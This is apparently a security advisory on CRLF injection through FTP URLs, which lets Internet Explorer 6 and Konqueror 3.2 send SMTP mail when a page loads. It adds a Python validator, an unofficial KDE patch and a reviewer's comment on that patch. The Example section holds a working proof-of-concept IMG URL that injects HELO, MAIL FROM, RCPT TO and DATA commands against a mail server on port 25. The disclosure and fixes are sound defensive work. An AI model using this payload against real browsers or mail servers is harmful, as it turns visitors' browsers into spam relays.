Both Internet Explorer and Konqueror can be tricked into sending mail through their FTP clients with no user interaction beyond loading a page.
Credit:
The information has been provided by Ian Gulliver.
Vulnerable Systems:
* Internet Explorer version 6 SP1
* Konqueror version 3.2
Immune Systems:
* Mozilla Firefox version 1.0
Both Internet Explorer and Konqueror accept %0a and %0d (URL-encoded line feed and carriage return) in URLs. In FTP URLs, they accept them in the username part of the URL. Because the FTP and SMTP protocols are similar, this can be used to send mail.
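The check below is an added example, not code from the advisory, KDE or either browser: it decodes the userinfo of an FTP URL the way a client would and rejects the URL if CR, LF or any other control character appears, which is stricter than the CR/LF test in the KDE patch further down. The function names and the sample URLs (example.com, a harmless NOOP command) are constructed for illustration.

```python
from urllib.parse import urlsplit, unquote

# Constructed sample URLs (not from the advisory); NOOP is a harmless FTP command.
INJECTED_URL = "ftp://anonymous%0d%0aNOOP:guest@ftp.example.com:21/"
CLEAN_URL = "ftp://anonymous:guest@ftp.example.com/pub/"


def decoded_credentials(url):
    """Return (user, password) with percent-escapes decoded, as a client would."""
    parts = urlsplit(url)
    return unquote(parts.username or ""), unquote(parts.password or "")


def wire_lines(url):
    """Protocol lines produced if the decoded username is sent unchecked."""
    user, _ = decoded_credentials(url)
    return ("USER " + user + "\r\n").splitlines()


def has_control_chars(value):
    """True if value holds CR, LF or any other ASCII control character."""
    return any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value)


def is_safe_ftp_url(url):
    """Accept only ftp:// URLs whose decoded userinfo is free of control chars."""
    if urlsplit(url).scheme != "ftp":
        return False
    return not any(has_control_chars(v) for v in decoded_credentials(url))


if __name__ == "__main__":
    for url in (CLEAN_URL, INJECTED_URL):
        verdict = "safe" if is_safe_ftp_url(url) else "rejected"
        print(url, "->", wire_lines(url), verdict)
```

Validating after decoding matters here: the raw URL contains no line terminators, only their percent-escaped forms.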
Danger:
Spammers could host websites containing images that cause visitors' browsers to send spam to more people. There are probably other protocols that the FTP client could be used to maliciously access.
Example:
http://dsbl.org/testingground/IE-FTP-SMTP-link/
That page has an IMG link with the following URL:
ftp://foo%0d%0aHELO mail%0d%0aMAIL FROM%3a<>%0d%0aRCPT TO%3a<ian-example%40penguinhosting.net>%0d%0aDATA%0d%0aSubject%3a hacked%0d%0aTo%3a ian%40penguinhosting.net%0d%0a%0d%0ahacked%0d%0a.%0d%0a:bar@mx.penguinhosting.net:25
Unofficial patch for KDE:
--- kdelibs-3.2.3/kioslave/ftp/ftp.cc 2004-02-15 16:15:27.000000000 -0500
+++ kdelibs-3.2.3-ftp-fixed/kioslave/ftp/ftp.cc 2004-12-25 00:44:27.000000000 -0500
@@ -652,6 +652,9 @@
{
assert( sControl > 0 );
+ if (cmd.find('\r') != -1 || cmd.find('\n') != -1)
+ return false;
+
QCString buf = cmd;
buf += "\r\n";
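Review bot: the new guard ahead of `QCString buf = cmd;` returns false with no comment or diagnostic, so a caller cannot tell a rejected command from a failed send, and the next reader gets no hint why CR and LF are refused. Suggest a one-line comment stating that an embedded line terminator would split `cmd` into several protocol lines, plus a debug message on the reject path. Since this function appends "\r\n" itself it is a sensible choke point for the check, but the test covers only '\r' and '\n'; consider whether other control characters in `cmd` should be refused here as well.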